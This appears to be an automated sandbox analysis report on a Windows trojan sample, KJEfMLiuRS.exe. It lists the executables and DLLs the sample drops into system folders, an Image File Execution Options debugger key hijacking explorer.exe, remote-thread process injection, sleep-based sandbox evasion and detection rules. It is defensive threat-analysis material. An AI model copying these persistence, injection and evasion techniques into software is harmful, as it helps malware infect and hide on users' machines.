Source: C:\Users\user\AppData\Roaming\tmp1D9F.tmp, type: DROPPED	Matched rule: SUSP_Four_Byte_XOR_PE_And_MZ author = Wesley Shields <wxs@atarininja.org>, description = Look for 4 byte xor of a PE starting at offset 0, score = 2021-10-11, reference = https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83
Source: C:\Users\user\AppData\Roaming\tmp1D9F.tmp, type: DROPPED	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: C:\Windows\SysWOW64\ubboonook.exe, type: DROPPED	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: C:\Users\user\AppData\Roaming\ogvubeak-omooc.dll, type: DROPPED	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: C:\Windows\SysWOW64\olfopeh-outix.exe, type: DROPPED	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Code function: 0_2_00404933 GetSystemDirectoryA,lstrcat,lstrcat,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlen,lstrcpy,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlen,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpi,lstrcmpi,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpy,lstrcpy,GetSystemDirectoryA,lstrcat,lstrcat,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcat,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcat,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcat,SetFileAttributesA,CreateFileA,GetTempPathA,lstrcat,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcat,ExpandEnvironmentStringsA,ExpandEnvironmentStringsA,RegOpenKeyExA,RegOpenKeyExA,lstrlen,RegSetValueExA,RegDeleteValueA,RegCloseKey,RegCreateKeyA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegDeleteValueA,RegEnumValueA,wsprintfA,RegSetValueExA,RegCloseKey,CreateThread,CloseHandle,RegCreateKeyExA,GetSystemTimeAsFileTime,RegQueryValueExA,RegQueryValueExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegCloseKey,SetFileAttributesA,RegCreateKeyA,RegSetValueExA,lstrlen,RegSetValueExA,RegCloseKey,SetFileAttributesA,RegCreateKeyA,lstrlen,RegOpenKeyExA,RegOpenKeyExA,lstrlen,RegSetValueExA,RegCloseKey,RegCreateKeyExA,RegCreateKeyExA,RegSetValueExA,RegCloseKey,SetFileAttributesA,RegCreateKeyA,lstrlen,RegSetValueExA,RegSetValueExA,RegCreateKeyA,lstrlen,RegSetValueExA,RegSetValueExA,RegCloseKey,RegCreateKeyA,RegCloseKey,SetFileAttributesA,Sleep,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegDeleteValueA,Sleep,RtlAdjustPrivilege,NtShutdownSystem,ExitWindowsEx,RegCloseKey,		0_2_00404933
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Code function: 1_2_00404933 GetSystemDirectoryA,lstrcat,lstrcat,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlen,lstrcpy,WriteFile,SetFileTime,CloseHandle,FindCloseChangeNotification,CreateFileA,RegSetValueExA,lstrlen,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpi,lstrcmpi,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpy,lstrcpy,GetSystemDirectoryA,lstrcat,lstrcat,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,FindCloseChangeNotification,GetLastError,ExpandEnvironmentStringsA,lstrcat,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcat,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcat,SetFileAttributesA,CreateFileA,GetTempPathA,lstrcat,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,FindCloseChangeNotification,CreateFileA,GetSystemDirectoryA,lstrcat,ExpandEnvironmentStringsA,ExpandEnvironmentStringsA,RegOpenKeyExA,RegOpenKeyExA,lstrlen,RegSetValueExA,RegDeleteValueA,RegCloseKey,RegCreateKeyA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegDeleteValueA,RegEnumValueA,wsprintfA,RegSetValueExA,RegCloseKey,CreateThread,CloseHandle,RegCreateKeyExA,GetSystemTimeAsFileTime,RegQueryValueExA,RegQueryValueExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegCloseKey,SetFileAttributesA,RegCreateKeyA,RegSetValueExA,lstrlen,RegSetValueExA,RegCloseKey,SetFileAttributesA,RegCreateKeyA,lstrlen,RegOpenKeyExA,RegOpenKeyExA,lstrlen,RegSetValueExA,RegCloseKey,RegCreateKeyExA,RegCreateKeyExA,RegSetValueExA,RegCloseKey,SetFileAttributesA,RegCreateKeyA,lstrlen,RegSetValueExA,RegSetValueExA,RegCreateKeyA,lstrlen,RegSetValueExA,RegSetValueExA,RegCloseKey,RegCreateKeyA,RegCloseKey,SetFileAttributesA,Sleep,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegDeleteValueA,Sleep,RtlAdjustPrivilege,NtShutdownSystem,ExitWindowsEx,RegCloseKey,		1_2_00404933

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe

File created: C:\Windows\SysWOW64\olfopeh-outix.exe

Jump to behavior

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Code function: 0_2_004035B5	0_2_004035B5
Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Code function: 0_2_0040BA4B	0_2_0040BA4B
Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Code function: 0_2_00404933	0_2_00404933
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Code function: 1_2_00404933	1_2_00404933
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Code function: 1_2_004035B5	1_2_004035B5
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Code function: 1_2_0040BA4B	1_2_0040BA4B

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Code function: 0_2_004035B5 GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,	0_2_004035B5
Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Code function: 0_2_00404933 GetSystemDirectoryA,lstrcat,lstrcat,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlen,lstrcpy,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlen,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpi,lstrcmpi,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpy,lstrcpy,GetSystemDirectoryA,lstrcat,lstrcat,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcat,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcat,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcat,SetFileAttributesA,CreateFileA,GetTempPathA,lstrcat,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcat,ExpandEnvironmentStringsA,ExpandEnvironmentStringsA,RegOpenKeyExA,RegOpenKeyExA,lstrlen,RegSetValueExA,RegDeleteValueA,RegCloseKey,RegCreateKeyA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegDeleteValueA,RegEnumValueA,wsprintfA,RegSetValueExA,RegCloseKey,CreateThread,CloseHandle,RegCreateKeyExA,GetSystemTimeAsFileTime,RegQueryValueExA,RegQueryValueExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegCloseKey,SetFileAttributesA,RegCreateKeyA,RegSetValueExA,lstrlen,RegSetValueExA,RegCloseKey,SetFileAttributesA,RegCreateKeyA,lstrlen,RegOpenKeyExA,RegOpenKeyExA,lstrlen,RegSetValueExA,RegCloseKey,RegCreateKeyExA,RegCreateKeyExA,RegSetValueExA,RegCloseKey,SetFileAttributesA,RegCreateKeyA,lstrlen,RegSetValueExA,RegSetValueExA,RegCreateKeyA,lstrlen,RegSetValueExA,RegSetValueExA,RegCloseKey,RegCreateKeyA,RegCloseKey,SetFileAttributesA,Sleep,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegDeleteValueA,Sleep,RtlAdjustPrivilege,NtShutdownSystem,ExitWindowsEx,RegCloseKey,	0_2_00404933
Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Code function: 0_2_0040318D CreateToolhelp32Snapshot,Process32First,lstrcmpi,lstrlen,OpenProcess,NtAllocateVirtualMemory,NtWriteVirtualMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualAlloc,lstrcpy,Process32Next,CloseHandle,	0_2_0040318D
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Code function: 1_2_00404933 GetSystemDirectoryA,lstrcat,lstrcat,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlen,lstrcpy,WriteFile,SetFileTime,CloseHandle,FindCloseChangeNotification,CreateFileA,RegSetValueExA,lstrlen,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpi,lstrcmpi,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpy,lstrcpy,GetSystemDirectoryA,lstrcat,lstrcat,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,FindCloseChangeNotification,GetLastError,ExpandEnvironmentStringsA,lstrcat,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcat,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcat,SetFileAttributesA,CreateFileA,GetTempPathA,lstrcat,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,FindCloseChangeNotification,CreateFileA,GetSystemDirectoryA,lstrcat,ExpandEnvironmentStringsA,ExpandEnvironmentStringsA,RegOpenKeyExA,RegOpenKeyExA,lstrlen,RegSetValueExA,RegDeleteValueA,RegCloseKey,RegCreateKeyA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegDeleteValueA,RegEnumValueA,wsprintfA,RegSetValueExA,RegCloseKey,CreateThread,CloseHandle,RegCreateKeyExA,GetSystemTimeAsFileTime,RegQueryValueExA,RegQueryValueExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegCloseKey,SetFileAttributesA,RegCreateKeyA,RegSetValueExA,lstrlen,RegSetValueExA,RegCloseKey,SetFileAttributesA,RegCreateKeyA,lstrlen,RegOpenKeyExA,RegOpenKeyExA,lstrlen,RegSetValueExA,RegCloseKey,RegCreateKeyExA,RegCreateKeyExA,RegSetValueExA,RegCloseKey,SetFileAttributesA,RegCreateKeyA,lstrlen,RegSetValueExA,RegSetValueExA,RegCreateKeyA,lstrlen,RegSetValueExA,RegSetValueExA,RegCloseKey,RegCreateKeyA,RegCloseKey,SetFileAttributesA,Sleep,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegDeleteValueA,Sleep,RtlAdjustPrivilege,NtShutdownSystem,ExitWindowsEx,RegCloseKey,	1_2_00404933
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Code function: 1_2_0040318D CreateToolhelp32Snapshot,Process32First,lstrcmpi,lstrlen,OpenProcess,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,CreateRemoteThread,CloseHandle,FindCloseChangeNotification,CloseHandle,VirtualAlloc,lstrcpy,Process32Next,CloseHandle,FindCloseChangeNotification,	1_2_0040318D
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Code function: 1_2_004035B5 GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,	1_2_004035B5

Source: KJEfMLiuRS.exe	Virustotal: Detection: 87%
Source: KJEfMLiuRS.exe	ReversingLabs: Detection: 96%

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe

File read: C:\Users\user\Desktop\KJEfMLiuRS.exe

Jump to behavior

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\KJEfMLiuRS.exe C:\Users\user\Desktop\KJEfMLiuRS.exe
Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Process created: C:\Windows\SysWOW64\olfopeh-outix.exe C:\Windows\system32\olfopeh-outix.exe
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Process created: C:\Windows\SysWOW64\olfopeh-outix.exe --k33p
Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Process created: C:\Windows\SysWOW64\olfopeh-outix.exe C:\Windows\system32\olfopeh-outix.exe	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Process created: C:\Windows\SysWOW64\olfopeh-outix.exe --k33p	Jump to behavior

Source: C:\Windows\SysWOW64\olfopeh-outix.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\olfopeh-outix.exe

File created: C:\Users\user\AppData\Roaming\tmp1D9F.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@5/6@232/4

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe

Code function: 0_2_00403478 GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,Process32Next,CloseHandle,WaitForSingleObject,CloseHandle,GetStartupInfoA,OpenProcess,CreateProcessA,ExitProcess,

0_2_00403478

Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\{0C8E6D89-EA51-848A-7775-6C2CC072CA88}
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0A
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0B
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0C
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0D
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0E
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0F
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1A59D3E9-9D17-EB65-EA3F-071C953972C0}
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-10
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-11
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-01
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-12
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-02
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-03
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-04
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-05
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-06
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-07
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-08
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnd_b__-09

Source: C:\Windows\SysWOW64\olfopeh-outix.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Code function: 0_2_00409940 push ecx; mov dword ptr [esp], eax	0_2_00409942
Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Code function: 0_2_0040C1A0 push 1000458Dh; retf	0_2_0040C1CC
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Code function: 1_2_00409940 push ecx; mov dword ptr [esp], eax	1_2_00409942
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Code function: 1_2_0040C1A0 push 1000458Dh; retf	1_2_0040C1CC

Source: KJEfMLiuRS.exe	Static PE information: section name: UPX2
Source: KJEfMLiuRS.exe	Static PE information: section name: .imports
Source: olfopeh-outix.exe.0.dr	Static PE information: section name: UPX2
Source: olfopeh-outix.exe.0.dr	Static PE information: section name: .imports

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe

Code function: 0_2_004035B5 GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,

0_2_004035B5

Source: ubboonook.exe.1.dr	Static PE information: real checksum: 0x80e8 should be: 0x17a14
Source: olfopeh-outix.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x18951
Source: atgusoon-odeas.exe.1.dr	Static PE information: real checksum: 0x4739 should be: 0x21573
Source: KJEfMLiuRS.exe	Static PE information: real checksum: 0x0 should be: 0x18951

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\olfopeh-outix.exe

Executable created and started: C:\Windows\SysWOW64\olfopeh-outix.exe

Jump to behavior

Source: C:\Windows\SysWOW64\olfopeh-outix.exe	File created: C:\Windows\SysWOW64\ubboonook.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	File created: C:\Windows\SysWOW64\atgusoon-odeas.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	File created: C:\Windows\SysWOW64\ivtahook-eaceab.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	File created: C:\Users\user\AppData\Roaming\ogvubeak-omooc.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	File created: C:\Windows\SysWOW64\olfopeh-outix.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\olfopeh-outix.exe	File created: C:\Windows\SysWOW64\ubboonook.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	File created: C:\Windows\SysWOW64\atgusoon-odeas.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	File created: C:\Windows\SysWOW64\ivtahook-eaceab.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	File created: C:\Windows\SysWOW64\olfopeh-outix.exe	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Windows\SysWOW64\olfopeh-outix.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe 01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567

Jump to behavior

Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe 01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567			Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe Debugger			Jump to behavior

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\Windows\SysWOW64\olfopeh-outix.exe

Stalling execution: Execution stalls by calling Sleep

graph_1-40733

Source: C:\Windows\SysWOW64\olfopeh-outix.exe TID: 780	Thread sleep count: 97 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\olfopeh-outix.exe TID: 780	Thread sleep time: -58200000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe

0_2_00403478

Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\ubboonook.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\atgusoon-odeas.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\ivtahook-eaceab.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\ogvubeak-omooc.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\olfopeh-outix.exe

Thread delayed: delay time: 600000

Jump to behavior

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Evaded block: after key decision	graph_0-40558
Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Evaded block: after key decision	graph_0-39855
Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Evaded block: after key decision	graph_0-40093
Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	Evaded block: after key decision	graph_0-40337

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe	API coverage: 0.9 %
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	API coverage: 6.3 %

Source: C:\Windows\SysWOW64\olfopeh-outix.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\olfopeh-outix.exe

Thread delayed: delay time: 600000

Jump to behavior

Source: C:\Windows\SysWOW64\olfopeh-outix.exe

API call chain: ExitProcess graph end node

graph_1-41427

Source: explorer.exe, 00000004.00000000.335694868.000000000830B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.403201692.000000000834F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 00000004.00000000.322482682.00000000059F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: explorer.exe, 00000004.00000000.403287151.0000000008394000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.338578649.000000000CDC8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000004.00000000.335694868.000000000830B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: KJEfMLiuRS.exe, 00000000.00000002.313800106.000000000066A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe

0_2_00403478

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe

0_2_004035B5

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe

